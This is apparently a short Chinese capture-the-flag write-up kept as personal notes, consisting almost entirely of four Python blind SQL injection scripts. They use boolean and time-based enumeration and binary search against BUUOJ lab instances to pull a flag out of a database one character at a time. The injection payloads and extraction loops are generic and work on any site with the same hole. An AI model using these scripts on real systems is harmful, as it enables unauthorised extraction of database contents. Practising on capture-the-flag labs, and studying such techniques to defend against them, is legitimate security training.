题目很简单,主要是练习一下脚本,做下记录方便查阅
exp
枚举法
import requests
import string
url="http://e57aa3be-d1dc-4ed4-a3a2-35878118c101.node5.buuoj.cn:81/index.php"
flag=""
for i in range(1,100):
for j in string.ascii_letters+string.digits+string.punctuation:
data={
"id":"if(substr((select(flag)from(flag)),{},1)='{}',1,0)".format(i,j)
}
r=requests.post(url,data=data)
if "Hello" in r.text:
flag+=j
print(flag)
continue
else:
pass
二分法
import requests
url="http://e57aa3be-d1dc-4ed4-a3a2-35878118c101.node5.buuoj.cn:81/index.php"
# select=""
result=""
for i in range(1,100):
left=32
right=127
mid=(left+right)//2
while left<right:
data={"id":f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,0)"}
r=requests.post(url,data=data)
if "Hello" in r.text:
left=mid+1
else:
right=mid
mid=(left+right)//2
result+=chr(left)
print(result)
时间盲注
import requests
import string
url="http://47b3e9b9-1cba-42c3-9231-d5131f3a8df1.node5.buuoj.cn:81/index"
flag=""
for i in range(1,100):
for j in string.ascii_letters+string.digits+string.punctuation:
try:
data={'id':f"if(substr((select(flag)from(flag)),{i},1)='{j}',sleep(2),0)"}
r=requests.post(url=url,data=data,timeout=2)
except:
flag+=j
print(flag)
continue
时间二分法
import requests
import string
url="http://47b3e9b9-1cba-42c3-9231-d5131f3a8df1.node5.buuoj.cn:81/index"
flag=""
for i in range(1,100):
left=32
right=127
mid=(left+right)//2
while left<right:
try:
data={"id":f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},0,sleep(2))"}
r=requests.post(url=url,data=data,timeout=2)
left=mid+1
except:
right=mid
mid=(left+right)//2
flag+=chr(left)
print(flag)
说些什么吧!